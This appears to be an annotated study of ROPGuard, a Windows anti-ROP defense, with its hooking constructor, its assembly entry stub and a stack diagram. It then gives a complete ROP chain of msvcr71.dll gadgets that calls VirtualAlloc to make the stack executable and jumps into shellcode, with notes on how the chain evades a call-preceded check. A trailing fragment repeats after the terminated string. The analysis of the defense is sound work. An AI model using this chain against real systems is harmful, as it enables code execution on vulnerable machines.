class ROPGuard
{
public:
    // Constructor: executes when the ROPGuard DLL is loaded into the target
    // process, because the DLL defines a global instance (see `ROPGuard h;`).
    // The order is deliberate: settings first, then the optional executable-
    // module cache, then the hooks on the guarded functions, then the optional
    // "loaded" notification.
    // NOTE(review): this runs during DLL load, i.e. in the loader's context;
    // confirm that calling MessageBoxA from there is acceptable for the
    // injection method in use.
    ROPGuard()
    {
        ReadROPSettings();

        // The executable-memory cache is opt-in and must exist before any
        // hook can consult it, so it is built ahead of PatchFunctions().
        if (GetROPSettings()->executableModuleCache)
            InitCacheData();

        // From here on the guarded functions are diverted through ROPGuard.
        PatchFunctions();

        if (!GetROPSettings()->showMessageBoxOnLoaded)
            return;
        MessageBoxA(NULL, "Successfully loaded ROPGuard dll into target process", "ROPGuard", MB_OK);
    }
};
// Single global instance. Its constructor performs all of the hooking, so
// merely loading the DLL arms ROPGuard; nothing else has to call into it.
ROPGuard h{};
…
ret = PatchFunction(guardedFunctions[i].moduleName,
guardedFunctions[i].functionName,
&(guardedFunctions[i].originalAddress),
&(patchcode[patchsizeused]));
if(ret) {
guardedFunctions[i].originalAddress = guardedFunctions[i].originalAddress^ADDR_SCRAMBLE_KEY;
guardedFunctions[i].patchedAddress = (unsigned long)(&(patchcode[patchsizeused]));
patchsizeused += 100;
} else {
guardedFunctions[i].originalAddress = 0;
}
…
// ROPGuard entry stub. PatchFunctions rewrites the header of each guarded function
// so that control is diverted here on every entry, before the original code runs.
// At this point [ESP] still holds the caller's return address with the arguments
// above it - the data that ROPCheck, given ESP, is in a position to inspect.
SUB ESP, PRESERVE_STACK //reserve PRESERVE_STACK bytes below the entry ESP so the check's own pushes and calls do not overwrite what the stack held there
PUSHAD //save the general-purpose registers as they were on entry to the guarded function
PUSH ESP //pointer to the saved-register block just pushed (arguments go right to left, so this is ROPCheck's second argument)
PUSH functionAddress //first argument: the processed (apparently XOR-scrambled, see the patching loop) address of the guarded function
CALL ROPCheck //entry point that runs the individual ROP checks
ADD ESP, PRESERVE_STACK + space taken by PUSHAD //restore ESP; the two pushed arguments are not counted here, so ROPCheck is presumably stdcall (callee pops them) - confirm. There is no POPAD, so registers are discarded rather than reloaded; fine only if the guarded functions take no register-passed arguments
jmp patchHeaderEnd //resume at the original function's real entry, just past the header bytes the patch overwrote
…
…
关键函数地址 //此时eip被控制,指向这里 — stack slot holding the critical (guarded) function's address: control has already been hijacked and EIP now points at the critical function
0xAABBCCDD //构造的返回地址 — attacker-constructed "return address"; on a legitimate call this slot would hold the address immediately following a CALL instruction
Arg1 //first argument to the critical function
Arg2 //second argument
Arg3 //third argument
Arg4 //fourth argument
…
//ROP chain built from msvcr71.dll gadgets. Every address is absolute (0x7c3xxxxx), so the
//chain assumes msvcr71.dll sits at its preferred base, i.e. has not been rebased by ASLR.
//Overall goal: call VirtualAlloc(lpAddress = current stack, 0x200, MEM_COMMIT,
//PAGE_EXECUTE_READWRITE) so the stack page becomes executable, then land in the shellcode
//that follows the chain via a `push esp # ret` gadget (the final entry).
//NOTE(review): VirtualAlloc is entered through a genuine `call VirtualAlloc` instruction
//inside msvcr71.dll (0x7c34a459), so the return address it leaves on the stack is
//call-preceded; a defense that only checks that property would not flag this chain.
//NOTE(review): the byte string contains embedded NUL bytes (the esi = 0 entry and the
//VirtualAlloc arguments), so it must be delivered by explicit length, never via strlen/strcpy.
//Stage (0): preload EDX and EBP with a writable address, needed by gadgets below that
//store through [EDX] (stage (1)) and read-modify-write [EBP+5] (stage (3)).
"\x2e\x40\x34\x7c" //0x7c34402e : # POP EDX # RETN ** [msvcr71.dll]
"\x98\xb1\x38\x7c" //0x7c38b198 ; [edx] must be writable; edx = 0x7c38b198
"\x13\x40\x37\x7c" //0x7c374013 : # POP EBP # RETN ** [msvcr71.dll] **
"\x98\xb1\x38\x7c" //0x7c38b198 ; [ebp] readable per the original note - and writable too, since stage (3) ORs into [EBP+5]; ebp = 0x7c38b198
//Stage (1): edx <- eax <- esi <- esp; edx will be VirtualAlloc's first argument (lpAddress), i.e. the current stack
"\x4f\x2f\x37\x7c" //0x7c372f4f : # PUSH ESP # AND AL,10 # MOV DWORD PTR DS:[EDX],ECX # POP ESI # RETN   (esi = esp; the MOV is the store through [EDX] that stage (0) prepared for)
"\x38\x05\x35\x7c" //0x7c350538 : # MOV EAX,ESI # POP ESI # RETN   (eax = esp)
"\x00\x00\x00\x00" //0x00000000 : esi = 0, so the SUB EDX,ESI below leaves edx == eax
"\xc6\x09\x36\x7c" //0x7c3609c6 : # MOV EDX,EAX
// # SUB EDX,ESI # MOV DWORD PTR DS:[EDX-4],ECX   (edx = the captured esp; the store lands on a stack slot the chain has already consumed, so it is harmless)
// # POP EDI # POP ESI # POP EBX
// # RETN
"\x41\x41\x41\x41" //0x41414141 : filler, edi = 0x41414141
"\x98\xb1\x38\x7c" //0x7c38b198 : [esi] writable; esi = 0x7c38b198
"\x41\x41\x41\x41" //0x41414141 : filler, ebx = 0x41414141
//Stage (2): ecx <- 0x7c34a459, the address of a `call VirtualAlloc` instruction in msvcr71.dll
"\x19\xc0\x36\x7c" //0x7c36c019 : # POP ECX # RETN ecx = 0x7c34a459
"\x59\xa4\x34\x7c" //0x7c34a459, # "call VirtualAlloc"
//Stage (3): lay out VirtualAlloc's arguments. The gadget pushes EDX (lpAddress) and then ECX,
//so its RETN pops ECX and executes `call VirtualAlloc` with lpAddress, dwSize,
//flAllocationType and flProtect on the stack in that order.
"\xce\x25\x34\x7c" //0x7c3425ce : # PUSH EDX # OR AL,39 //edx = first argument (lpAddress)
// # PUSH ECX # OR BYTE PTR SS:[EBP+5],DH # MOV EAX,1   (the OR writes memory - hence the writable EBP from stage (0))
// # RETN ** [msvcr71.dll] ** | {PAGE_EXECUTE_READ}
"\x00\x02\x00\x00" //0x00000200, # dwSize
"\x00\x10\x00\x00" //0x00001000, # flAllocationType = MEM_COMMIT
"\x40\x00\x00\x00" //0x00000040, # flProtect = PAGE_EXECUTE_READWRITE
"\x41\x41\x41\x41" //0x41414141, # junk (consumed after VirtualAlloc returns, before the final RET - presumably by the code following the call site; confirm)
"\x42\x42\x42\x42" //0x42424242, # junk
"\x30\x5c\x34\x7c"; //0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll] - transfers execution to the shellcode placed immediately after the chain
"\x2e\x40\x34\x7c" //0x7c34402e : # POP EDX # RETN ** [msvcr71.dll]
"\x98\xb1\x38\x7c" //0x7c38b198 ; [edx]可写 edx = 0x7c38b198
"\x13\x40\x37\x7c" //0x7c374013 : # POP EBP # RETN ** [msvcr71.dll] **
"\x98\xb1\x38\x7c" //0x7c38b198 ; [ebp]可读 ebp = 0x7c38b198